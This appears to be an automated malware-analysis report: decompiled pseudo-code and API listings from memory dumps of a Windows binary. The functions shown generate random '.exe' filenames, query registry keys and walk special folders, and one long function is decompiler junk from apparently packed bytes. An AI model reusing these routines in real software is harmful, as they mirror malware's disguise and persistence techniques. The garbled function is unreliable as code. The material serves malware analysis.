        						_t19 =  *0x423e90;
        						 *((char*)( *0x423e90 + 0x124)) = _t17;
        						SetEvent( *0x423e8c);
        					}
        				}
        				return _t12 & 0xffffff00 | _t12 == 0x00000000;
        			}








        APIs
        • GetCurrentThread.KERNEL32 ref: 0040ABF0
        • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00413D65), ref: 0040ABF7
        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00413D65), ref: 0040AC09
        • SetEvent.KERNEL32(00423E80,?,00000001), ref: 0040AC56
        • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 0040AC63
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: EventThread$CurrentMessagePriority
        • String ID:
        • API String ID: 3943651903-0
        • Opcode ID: d3d8f16731c275643d1477cb908263aec5f2c5ecb2b4e831de75395752d70c01
        • Instruction ID: ca80f19ddb359120c232e7af1eb8342aa168f542fbea1137669a9aa91f358d40
        • Opcode Fuzzy Hash: d3d8f16731c275643d1477cb908263aec5f2c5ecb2b4e831de75395752d70c01
        • Instruction Fuzzy Hash: 1401D2316043006BDB20EB74ED09B5A77B49B85334F56073AF520A21F0C779D96ACB5E
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF,0002075A,004081C2,00000000), ref: 00407D8F
        • ReleaseMutex.KERNEL32(?), ref: 00407DC3
        • IsWindow.USER32(?), ref: 00407DCA
        • PostMessageW.USER32(?,00000215,00000000,?), ref: 00407DE4
        • SendMessageW.USER32(?,00000215,00000000,?), ref: 00407DEC
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
        • String ID:
        • API String ID: 794275546-0
        • Opcode ID: 15be79492956ead7a4a7209f24eef6585524cb317c994d7205593c924794d8a8
        • Instruction ID: 06e7c1503072b329be2a24b48e7d77bd3e331f23a6dc97bf78322ca8c30e116d
        • Opcode Fuzzy Hash: 15be79492956ead7a4a7209f24eef6585524cb317c994d7205593c924794d8a8
        • Instruction Fuzzy Hash: ABF0B6745083019BC3219F24DD48DAABBB5FF89711B044A7DF496A33B1C774A844DB26
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF,7743A660,004081C2,00000000), ref: 00407D8F
        • ReleaseMutex.KERNEL32(?), ref: 00407DC3
        • IsWindow.USER32(?), ref: 00407DCA
        • PostMessageW.USER32(?,00000215,00000000,?), ref: 00407DE4
        • SendMessageW.USER32(?,00000215,00000000,?), ref: 00407DEC
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
        • String ID:
        • API String ID: 794275546-0
        • Opcode ID: 15be79492956ead7a4a7209f24eef6585524cb317c994d7205593c924794d8a8
        • Instruction ID: 06e7c1503072b329be2a24b48e7d77bd3e331f23a6dc97bf78322ca8c30e116d
        • Opcode Fuzzy Hash: 15be79492956ead7a4a7209f24eef6585524cb317c994d7205593c924794d8a8
        • Instruction Fuzzy Hash: ABF0B6745083019BC3219F24DD48DAABBB5FF89711B044A7DF496A33B1C774A844DB26
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 44%
        			E0040B1F7(void* __eax, void* __ebx, void* __ecx, signed char __edx, void* __edi, void* __esi) {
        				intOrPtr _t73;
        				intOrPtr _t74;
        				int _t76;
        				void* _t78;
        				intOrPtr* _t81;
        				signed char _t82;
        				void* _t85;
        				void* _t87;
        
        				_t85 = __esi;
        				_t82 = __edx;
        				_t78 = __ebx;
        				_push(__eax);
        				while(1) {
        					L10:
        					asm("movsb");
        					asm("popfd");
        					_push(__edx);
        					asm("loope 0xffffffd9");
        					while(1) {
        						asm("lock cmp eax, 0xd1712469");
        						 *(__edx + 0x7c) =  *(__edx + 0x7c) | __dl;
        						asm("clc");
        						__eflags =  *__ecx & __esp;
        						asm("psubb mm1, [ebp-0x6a48c8df]");
        						 *__eax =  *__eax & __edi;
        						__eflags =  *__eax;
        						if(__eflags >= 0) {
        							L18:
        							asm("sbb edx, eax");
        							 *(__ebx + 0x2f03b555) = __ch;
        						} else {
        							asm("adc [edi-0x53fa6e9d], ch");
        							 *__esi = __ebp;
        							if(__eflags >= 0) {
        								__bh = __bh &  *__ecx;
        								asm("cmpsd");
        								__edx = __edx - 1;
        								__eflags = __edx;
        								if(__edx >= 0) {
        									goto L10;
        								} else {
        									asm("fldenv [ss:edi]");
        									_pop(__esp);
        									 *__ebx =  *__ebx | 0x2f05d325;
        									__eflags =  *__ebx;
        									L17:
        									asm("das");
        									 *(__edx - 0x6e998843) =  *(__edx - 0x6e998843) & __eax;
        									__eax =  &(__eax[0xfffffffffd168764]);
        									__ch = __ch << 1;
        									asm("adc [edx], ecx");
        									asm("stosd");
        									__eax = __eax - 0x1b2f05d3;
        									__eflags = __eax;
        									goto L18;
        								}
        							}
        						}
        						__ch = 3;
        						asm("das");
        						if(__eflags >= 0) {
        							while(1) {
        								L5:
        								 *(_t74 + 0x57) =  *(_t74 + 0x57) | _t82;
        								E0040B07E(_t81, _t85);
        								while(1) {
        									_t78 = _t78 + 1;
        									_t85 = _t85 + 0xc;
        									if(_t78 >=  *((intOrPtr*)(_t87 - 8))) {
        										break;
        									}
        									_t81 = _t85 +  *((intOrPtr*)(_t87 - 0xc));
        									_t73 =  *((intOrPtr*)(_t81 + 8));
        									if(_t73 == 0 || _t73 == 4) {
        										_t74 =  *_t81;
        										if(_t74 !=  *((intOrPtr*)(_t87 - 0x14))) {
        											_push( *((intOrPtr*)(_t87 + 0xc)));
        											_push( *((intOrPtr*)(_t87 + 8)));
        											goto L5;
        										}
        									}
        								}
        								 *((intOrPtr*)(_t87 - 0x10))( *((intOrPtr*)(_t87 - 0xc)));
        								_t76 = FreeLibrary( *(_t87 - 4));
        								return _t76;
        								goto L90;
        							}
        						} else {
        							_push(__esi);
        							asm("sbb al, 0xb1");
        							__eflags =  *((intOrPtr*)(__eax - 0x2d)) - __esp;
        							gs =  *__esi;
        							__edi = __edi - 0x2d47557e;
        							__eflags = __edi;
        							if(__edi >= 0) {
        								goto L17;
        							} else {
        								 *(__ebx + 0x55) = 3;
        								asm("std");
        								_push(__ebp);
        								while(1) {
        									 *__edx = 0xf52f0585;
        									asm("adc [edx], ecx");
        									asm("stosd");
        									__ecx = __ecx + 1;
        									__eflags = __ecx;
        									asm("rol dword [0x437ce2f], cl");
        									asm("das");
        									if(__ecx >= 0) {
        										break;
        									}
        									_push(__ebx);
        									 *0x7f75f535 = __al;
        									asm("cdq");
        									__cl = __cl &  *__edx;
        									__eflags = __cl;
        									asm("das");
        									if(__eflags >= 0) {
        										L31:
        										asm("adc eax, 0x11bb712f");
        										 *0x2961cdfd = __al;
        										if(__eflags >= 0) {
        											asm("cmpsb");
        											__eax = __eax | 0x3dc76df5;
        											asm("retf");
        											__eax =  &(__eax[0x2c6fe17]);
        											__eax = __eax - 0xa253c51b;
        											asm("std");
        											asm("int 0x5d");
        											__eax = __eax - 0x9b88d171;
        											_push(__ebp);
        											asm("das");
        											__al = __al + 0x2f;
        											__eflags = __al;
        											asm("das");
        											if(__eflags >= 0) {
        												if(__eflags >= 0) {
        													goto L34;
        												} else {
        													__eax =  &(__eax[0x16fa9ad3]);
        													asm("sbb eax, 0xb815caa");
        													__ebp = __ebp - __edx;
        													__eax =  &(__eax[0x3dd9097]);
        													__eflags = __eax;
        													asm("lahf");
        													if(__eax < 0) {
        														__eflags = __al;
        														if(__eflags >= 0) {
        															goto L48;
        														} else {
        															__dl = 0xf7;
        															while(1) {
        																L51:
        																 *__ebx =  ~( *__ebx);
        																while(1) {
        																	asm("sbb edx, eax");
        																	gs = __ecx;
        																	__al = 0x32;
        																	asm("adc eax, 0x5f0e3c7");
        																	asm("das");
        																	if(__eflags <= 0) {
        																		goto L63;
        																	}
        																	L53:
        																	asm("lds esp, [edx+esi*4]");
        																	_pop(__eax);
        																	 *__ebx =  *__ebx | 0x2f05d337;
        																	__eflags =  *__ebx;
        																	L54:
        																	__esi = __esi |  *__edi;
        																	__eflags = __esi;
        																	asm("rol dword [0x8ed01b2f], cl");
        																	goto 0x2f656062;
        																	if(__eflags >= 0) {
        																		asm("sbb edx, eax");
        																		gs = __ecx;
        																		__al = 0x32;
        																		asm("adc eax, 0x5f0e3c7");
        																		asm("das");
        																		if(__eflags <= 0) {
        																			goto L63;
        																		}
        																	} else {
        																		__dl = 0xf7;
        																		asm("sbb edx, eax");
        																		gs = __ecx;
        																		__al = 0x32;
        																		asm("adc eax, 0x5f01fc7");
        																		asm("das");
        																		if(__eflags <= 0) {
        																			L68:
        																			if(__eflags >= 0) {
        																				goto L61;
        																			} else {
        																				__edi = __edi - 0x6388f405;
        																				__eflags = __edi;
        																				L70:
        																				asm("arpl [ebp-0x3b], dx");
        																				asm("in eax, dx");
        																				L71:
        																				asm("std");
        																				if(__eflags > 0) {
        																					L64:
        																					asm("stosd");
        																					_push(__ebp);
        																					__eflags =  *__edi & __eax;
        																					asm("das");
        																					if(__eflags >= 0) {
        																						goto L51;
        																					} else {
        																						 *(__ebx + 0x55) = __ch;
        																						__eax =  *0x2ae0c755;
        																						asm("cli");
        																						L66:
        																						__ch = __ch << 1;
        																						asm("adc [ecx+0x70], esi");
        																						asm("cld");
        																						_t56 = __eax;
        																						__eax = __ebp;
        																						__ebp = _t56;
        																						 *__ebx =  *__ebx & __edi;
        																						 *__esi =  *__esi & __ebp;
        																						__eflags =  *__esi;
        																						if(__eflags >= 0) {
        																							goto L70;
        																						} else {
        																							__edi =  *__ecx * 0xd1714c44;
        																							__eflags = __edi;
        																							goto L68;
        																						}
        																					}
        																				} else {
        																					__eax =  &(__eax[0xffffffffc0ae40d2]);
        																					__eflags = __eax;
        																				}
        																			}
        																		} else {
        																			asm("lds esp, [edx+esi*4]");
        																			_pop(__eax);
        																			 *__ebx =  *__ebx | 0x2f05d33b;
        																			asm("cld");
        																			_push(__ebp);
        																			_t41 = __edi + 0x79;
        																			 *_t41 =  *(__edi + 0x79) & __eax;
        																			__eflags =  *_t41;
        																			L58:
        																			__edi = __edi + 1;
        																			__eflags = __edi;
        																			if(__edi >= 0) {
        																				goto L54;
        																			} else {
        																				__eax =  &(__eax[0x2a8ac63]);
        																				asm("das");
        																				asm("sbb ebx, edx");
        																				__al = __al + 0x2f;
        																				__eflags = __al;
        																				if(__al < 0) {
        																					 *__ebx =  *__ebx | 0x2f05d81e;
        																					 *(__ecx + 0xb + __eax * 4) =  *(__ecx + 0xb + __eax * 4) & __ebx;
        																					asm("adc ebp, edx");
        																					__eax =  &(__eax[0xfffffffffb1c9098]);
        																					__dh = __dh &  *(__ecx - 0x2f);
        																					_push(__edx);
        																					 *0x7f69f535 = __al;
        																					asm("cld");
        																					_push(__ebp);
        																					_t50 = __edi + 0x75;
        																					 *_t50 =  *(__edi + 0x75) & __ecx;
        																					__eflags =  *_t50;
        																					L61:
        																					__edi = __edi - 1;
        																					__eflags = __edi;
        																					if(__edi != 0) {
        																						goto L58;
        																					} else {
        																						__eax =  &(__eax[0x2f9a863]);
        																						asm("das");
        																						goto L63;
        																					}
        																				}
        																			}
        																		}
        																	}
        																	 *__ebx =  *__ebx | 0x2f05d321;
        																	 *__ecx =  *__ecx & __edi;
        																	asm("pushad");
        																	__ebp = __ebp - 1;
        																	__eflags = __ebp;
        																	if(__eflags >= 0) {
        																		goto L66;
        																	}
        																	 *(__ebx + 0x2f03b155) = __ch;
        																	while(1) {
        																		asm("stosd");
        																		_push(__ebp);
        																		__cl = 3;
        																		asm("das");
        																		if(__eflags >= 0) {
        																			goto L58;
        																		}
        																		asm("in eax, dx");
        																		if(__eflags <= 0) {
        																			asm("rol dword [0x2195fc78], 1");
        																			__ebx = __ebx + 1;
        																			_t58 = __ecx - 0x2eccebd3;
        																			 *_t58 =  *(__ecx - 0x2eccebd3) & __edi;
        																			__eflags =  *_t58;
        																			asm("in eax, dx");
        																			asm("lodsd");
        																			if(__eflags < 0) {
        																				goto L71;
        																			} else {
        																				__eax =  &(__eax[0xcfa92d2]);
        																				__eflags = __eax;
        																			}
        																		}
        																		__eax = __eax & 0xb9ac19f5;
        																		__eflags = __eax;
        																		 *[cs:ebx+0x2f078155] = __ah;
        																		if(__eflags >= 0) {
        																			__al = __al + __ch;
        																			 *__eax =  *__eax + __al;
        																			_t60 = __ebp - 0x214; // 0x616aeb1a
        																			_t60 = E00413447(__ecx, _t60);
        																			_t61 = __ebp - 0x198; // 0x616aeb96
        																			__eax = _t61;
        																			__ecx = 0x423b18;
        																			__eax = E0040C233(_t61, 0x423b18, 0x10);
        																			__eflags = __eax;
        																			if(__eax != 0) {
        																				L88:
        																				__al = 0;
        																				__eflags = 0;
        																			} else {
        																				__ecx =  *0x4238fc;
        																				__eax = E0040CD11( *0x4238fc);
        																				__edi = 0x423900;
        																				__ecx = 0x423900;
        																				 *(__ebp + 8) = __eax;
        																				__eax = E0040CD11(0x423900);
        																				__ebx = __eax;
        																				_t63 = __ebp - 0x2c; // 0x616aed02
        																				__esi = _t63;
        																				__eax = __eax | 0xffffffff;
        																				_t64 = __ebp - 0x86; // 0x616aeca8
        																				__ecx = _t64;
        																				__eax = E0040C3CD(__eax, _t64, _t63, 0, 0x14);
        																				__eflags =  *(__ebp + 8) - __ebx;
        																				if( *(__ebp + 8) <= __ebx) {
        																					goto L88;
        																				} else {
        																					__eax =  *0x4238fc;
        																					__esi = __ebx + __ebx;
        																					__eflags =  *((short*)(__eax + __esi)) - 0x5c;
        																					if( *((short*)(__eax + __esi)) != 0x5c) {
        																						goto L88;
        																					} else {
        																						__eax = StrCmpNIW(0x423900, __eax, __ebx);
        																						__eflags = __eax;
        																						if(__eax != 0) {
        																							goto L88;
        																						} else {
        																							_t69 =  &(( *0x4238fc)[1]); // 0x423902
        																							__eax = _t69 + __esi;
        																							_t70 = __ebp - 0x2c; // 0x616aed02
        																							__eax = _t70;
        																							__eax = lstrcmpiW(_t70, _t69 + __esi);
        																							__eflags = __eax;
        																							if(__eax != 0) {
        																								goto L88;
        																							} else {
        																								__al = 1;
        																							}
        																						}
        																					}
        																				}
        																			}
        																			_pop(__edi);
        																			_pop(__esi);
        																			_pop(__ebx);
        																			__esp = __ebp;
        																			_pop(__ebp);
        																			return __eax;
        																		} else {
        																			 *__edi =  *__edi >> 1;
        																			if(__eflags >= 0) {
        																				continue;
        																			} else {
        																				return __eax;
        																			}
        																		}
        																		goto L90;
        																	}
        																	goto L58;
        																	L63:
        																	asm("sbb edx, ecx");
        																	 *(__ebx + 0x2f078555) = __ch;
        																	goto L64;
        																}
        															}
        														}
        													} else {
        														__edi = __eax + __edi;
        														__eax[0x33bf1782] = __eax;
        														asm("invalid");
        														__eax =  &(__eax[0x382392aa]);
        														asm("rol byte [0x86d11b2f], 1");
        														asm("out 0x8e, eax");
        														_pop(__esp);
        														 *__ebx = __ecx;
        														asm("adc ebp, edx");
        														__eax =  &(__eax[0x5054c97]);
        														__eflags = __eax;
        														asm("das");
        														if(__eax >= 0) {
        															L47:
        															asm("rol dword [eax-0x422fa11], 1");
        															__edx =  *(__ebp - 0x3d) * 0x3d;
        															__eflags =  *(__ebp - 0x3d) * 0x3d;
        															L48:
        															_push(__ebp);
        															return __eax;
        														} else {
        															__ecx = __ecx + 1;
        															__esp = __esp |  *(__ebx - 0x2f);
        															__esp = __esp ^ 0x990af305;
        															__eflags = __esp;
        															asm("repe or bl, [ecx+0x7917f535]");
        															_pop(ss);
        															if(__eflags >= 0) {
        																goto L35;
        															} else {
        																asm("movsd");
        																 *__ebx =  *__ebx | 0x3d1dc48e;
        																__eflags = __ecx;
        																goto L47;
        															}
        														}
        													}
        												}
        											} else {
        												asm("int 0xd0");
        												asm("cdq");
        												ss =  *0x11bb712f;
        												goto L31;
        											}
        										} else {
        											asm("outsd");
        											asm("das");
        											asm("cld");
        											 *[gs:0xac05d173] =  *[gs:0xac05d173] & __edi;
        											__ecx = 0x616aed2e;
        											asm("rol dword [0x5bb7b45], 1");
        											L34:
        											 *0x2d23f5c5 = __al;
        											L35:
        											__eax = __eax - 0xe786d171;
        											__eflags = __eax;
        										}
        									} else {
        										__ecx = __ecx + 1;
        										__ebx = __ebx |  *0xf106ed81;
        										__eflags = __ebx;
        										asm("rol dword [0xe1f5f5a2], 1");
        										asm("das");
        										if(__ebx >= 0) {
        											continue;
        										} else {
        											asm("invalid");
        											__eflags =  *0x6fd01b2f & __eax;
        											es = __ebp;
        											asm("cld");
        											_t24 = __eax;
        											__eax = __ebp;
        											__ebp = _t24;
        											 *(__edi + 0x21) =  *(__edi + 0x21) & __esp;
        											__eflags = __ebp - __edi;
        											__esi = __esi |  *(__ecx - 0x2f);
        											asm("outsd");
        											_pop(es);
        											asm("cld");
        											_t28 = __eax;
        											__eax = __ebp;
        											__ebp = _t28;
        											 *(__ebx + 0x21) =  *(__ebx + 0x21) & __ebp;
        											_pop(__esp);
        											 *__ebx =  *__ebx | 0x2f05d18d;
        											__eflags =  *__ebx;
        											asm("cdq");
        											asm("lock das");
        											if (__eflags >= 0) goto L38;
        											_pop(__edx);
        										}
        									}
        									goto L90;
        								}
        								asm("lock cmp eax, 0xd1712469");
        								goto L12;
        							}
        						}
        						L90:
        						L12:
        						__al = __al & 0x00000071;
        						asm("rcl dword [esi+0x79], 1");
        						asm("cli");
        					}
        				}
        			}












        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID:
        • String ID: .ja
        • API String ID: 0-198210695
        • Opcode ID: 58ffda41fd4ef63771d01ae4a610163495b8d79403c91559fdd20033f6f43632
        • Instruction ID: 1a1eb6925cd5e3175a6f5b14556fc2d033f816b99603b7fd899d67576d67dd6f
        • Opcode Fuzzy Hash: 58ffda41fd4ef63771d01ae4a610163495b8d79403c91559fdd20033f6f43632
        • Instruction Fuzzy Hash: 36B1AB72900615DBCB21DF68D8869AA7BF4FF6131679440BFD481EB282C3399542CBAD
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00410541(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
        				signed int _v8;
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				intOrPtr _v24;
        				char* _v28;
        				char* _v32;
        				signed int _t56;
        				WCHAR* _t57;
        				short* _t59;
        				signed short _t71;
        				char* _t77;
        				signed int _t84;
        				signed short* _t85;
        				signed int _t87;
        				intOrPtr _t88;
        				void* _t89;
        
        				_t87 = E0040D547(__eax & 0x000000ff, __ecx & 0x000000ff);
        				_v16 = _t87;
        				_t56 = E0040D4FB();
        				_t77 = "bcdfghklmnpqrstvwxz";
        				if((_t56 & 0x00000100) == 0) {
        					_v32 = "aeiouy";
        					_v28 = _t77;
        				} else {
        					_v32 = _t77;
        					_v28 = "aeiouy";
        				}
        				_t84 = 0;
        				_v12 = 0;
        				_v8 = 0;
        				if(_t87 > 0) {
        					_v20 = _a4 & 0x00000004;
        					do {
        						if(_v8 == 2) {
        							if((E0040D4FB() & 0x00000100) == 0) {
        								_v32 = "aeiouy";
        								_v28 = _t77;
        							} else {
        								_v32 = _t77;
        								_v28 = "aeiouy";
        							}
        							_v8 = _v8 & 0x00000000;
        						}
        						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
        						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
        						if(_v20 == 0 || _t84 - _v12 <= 1 || (E0040D4FB() & 0x00000101) != 0x101) {
        							_t71 =  *((char*)(E0040D547(_v24 - 1, 0) + _t88));
        						} else {
        							_t71 = 0x20;
        							_v12 = _t84;
        						}
        						_a8[_t84] = _t71;
        						_t84 = _t84 + 1;
        						_v8 = _v8 + 1;
        					} while (_t84 < _v16);
        					_t87 = _v16;
        				}
        				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
        					_t85 = _a8;
        				} else {
        					_t85 = _a8;
        					_t59 = _t85 + _t87 * 2 - 2;
        					while( *_t59 == 0x20) {
        						_t59 = _t59 - 2;
        						_t87 = _t87 - 1;
        						if(_t87 != 0) {
        							continue;
        						} else {
        						}
        						goto L24;
        					}
        				}
        				L24:
        				_t57 = 0;
        				_t85[_t87] = 0;
        				if((_a4 & 0x00000002) != 0) {
        					_t57 = CharUpperW( *_t85 & 0x0000ffff);
        					 *_t85 = 0;
        				}
        				return _t57;
        			}





















        APIs
          • Part of subcall function 0040D4FB: GetTickCount.KERNEL32 ref: 0040D4FB
        • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00410662
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CharCountTickUpper
        • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
        • API String ID: 2674899715-3410450461
        • Opcode ID: 520400651df368d3e5a572de1fd8fab3b317441505123ece1166f3a8820f7981
        • Instruction ID: 70c39ba6cf171069a6263e6643defc9655b360b2b806ad9082fd34d7e2821c11
        • Opcode Fuzzy Hash: 520400651df368d3e5a572de1fd8fab3b317441505123ece1166f3a8820f7981
        • Instruction Fuzzy Hash: 4A318FB1D00219ABCB10DF99C5456EEBBB5EF84308F50806BD851AB281D3B8DED1CBD9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 85%
        			E004188A1(void* __ecx, char* __edx, void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v52;
        				char _v76;
        				char _v116;
        				char _v636;
        				short _v1156;
        				void* __edi;
        				void* __esi;
        				void* _t28;
        				void* _t30;
        				void* _t35;
        				void* _t39;
        				char* _t42;
        				void* _t52;
        				WCHAR* _t55;
        				char* _t60;
        				signed int _t61;
        				void* _t62;
        				intOrPtr _t70;
        
        				_t54 = __edx;
        				_t52 = __ecx;
        				E0040C275( &_v12,  &_v12, 0, 8);
        				_t28 = 0x60;
        				E004128DB(_t28,  &_v116);
        				_t30 = 0x61;
        				E004128DB(_t30,  &_v52);
        				_t55 =  &_v636;
        				_t35 = E004102E6(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
        				if(_t35 != 0xffffffff) {
        					_t65 = _t35;
        					if(_t35 > 0) {
        						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
        						E00418659(_t65,  &_v1156,  &_v12);
        					}
        				}
        				if(_v8 != 0) {
        					L9:
        					if(_t70 <= 0) {
        						return E0040C1C2(_v12);
        					}
        					_push(0xcb);
        					return E00417504(_t54, _v12, 0x63);
        				} else {
        					_t60 =  &_v76;
        					_t39 = 0x62;
        					E004128DB(_t39, _t60);
        					_v28 = 0x23;
        					_v24 = 0x1a;
        					_v20 = 0x26;
        					_v16 = _t60;
        					_t61 = 0;
        					do {
        						_t42 =  &_v636;
        						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
        						_t68 = _t42;
        						if(_t42 == 0) {
        							_t54 =  &_v16;
        							E004118EB( &_v636,  &_v16, _t68, 1, 2, E004186B3,  &_v12, 0, 0, 0);
        						}
        						_t61 = _t61 + 1;
        					} while (_t61 < 3);
        					_t70 = _v8;
        					goto L9;
        				}
        			}




























        APIs
          • Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB
        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00418903
        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00418953
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: EnvironmentExpandFolderOpenPathStrings
        • String ID: #$&
        • API String ID: 1994525040-3870246384
        • Opcode ID: dd589366d4a22c1d1b435649e84aa9f9cd5bddca97d4c06dc4976b07a5e37fbf
        • Instruction ID: ac8f521ba52bef1e60359586b78410cc296b3e4c34e499de3016cc90cc8362ea
        • Opcode Fuzzy Hash: dd589366d4a22c1d1b435649e84aa9f9cd5bddca97d4c06dc4976b07a5e37fbf
        • Instruction Fuzzy Hash: 513161B2D0021CBADF10ABA1DC89FEE777CEB04318F10496BF601F7191DA785A858B95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 85%
        			E00419151(void* __ecx, char* __edx, void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v44;
        				char _v68;
        				char _v120;
        				char _v644;
        				short _v1164;
        				void* __edi;
        				void* __esi;
        				void* _t28;
        				void* _t30;
        				void* _t35;
        				void* _t39;
        				char* _t42;
        				void* _t52;
        				WCHAR* _t55;
        				char* _t60;
        				signed int _t61;
        				void* _t62;
        				intOrPtr _t70;
        
        				_t54 = __edx;
        				_t52 = __ecx;
        				E0040C275( &_v12,  &_v12, 0, 8);
        				_t28 = 0x77;
        				E004128DB(_t28,  &_v120);
        				_t30 = 0x78;
        				E004128DB(_t30,  &_v44);
        				_t55 =  &_v644;
        				_t35 = E004102E6(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
        				if(_t35 != 0xffffffff) {
        					_t65 = _t35;
        					if(_t35 > 0) {
        						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
        						E00418EF4(_t65,  &_v1164,  &_v12);
        					}
        				}
        				if(_v8 != 0) {
        					L9:
        					if(_t70 <= 0) {
        						return E0040C1C2(_v12);
        					}
        					_push(0xcb);
        					return E00417504(_t54, _v12, 0x7a);
        				} else {
        					_t60 =  &_v68;
        					_t39 = 0x79;
        					E004128DB(_t39, _t60);
        					_v28 = 0x1a;
        					_v24 = 0x26;
        					_v20 = 0x23;
        					_v16 = _t60;
        					_t61 = 0;
        					do {
        						_t42 =  &_v644;
        						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
        						_t68 = _t42;
        						if(_t42 == 0) {
        							_t54 =  &_v16;
        							E004118EB( &_v644,  &_v16, _t68, 1, 2, E00418F2C,  &_v12, 0, 0, 0);
        						}
        						_t61 = _t61 + 1;
        					} while (_t61 < 3);
        					_t70 = _v8;
        					goto L9;
        				}
        			}




























        APIs
          • Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB
        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004191B3
        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 00419203
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: EnvironmentExpandFolderOpenPathStrings
        • String ID: #$&
        • API String ID: 1994525040-3870246384
        • Opcode ID: e2d6fae7bfa2462f7cf2489f033b08787f013d4ebafe9ec3cb0b67d498f2f6fc
        • Instruction ID: 0a346ad2d6c3d13acfe76843b96ae85bb264e43f969464dbd46b1843a5f0c36d
        • Opcode Fuzzy Hash: e2d6fae7bfa2462f7cf2489f033b08787f013d4ebafe9ec3cb0b67d498f2f6fc
        • Instruction Fuzzy Hash: 86314FB2D0021CBADF10ABE19C99EDE777CEB04314F10496AF605F7181D6789EC98BA5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041349C(void* __ecx, WCHAR* __edi, char _a4) {
        				char _v108;
        				char _v158;
        				char _v178;
        				char _v198;
        				char _v596;
        				void* __esi;
        				signed int _t12;
        				int _t14;
        				WCHAR* _t16;
        				char* _t18;
        				WCHAR* _t19;
        
        				_t19 = __edi;
        				 *__edi = 0;
        				E00413447(__ecx,  &_v596);
        				_t2 =  &_a4; // 0x412c69
        				_t12 =  *_t2;
        				if(_t12 == 0) {
        					L6:
        					_t18 =  &_v178;
        					goto L7;
        				} else {
        					_t12 = _t12 - 1;
        					if(_t12 == 0) {
        						_t18 =  &_v198;
        						L7:
        						_t16 = 0x423900;
        						goto L8;
        					} else {
        						_t12 = _t12 - 1;
        						if(_t12 == 0) {
        							goto L6;
        						} else {
        							_t14 = _t12 - 1;
        							if(_t14 == 0) {
        								_t16 = L"SOFTWARE\\Microsoft";
        								_t18 =  &_v158;
        								L8:
        								_t21 =  &_v108;
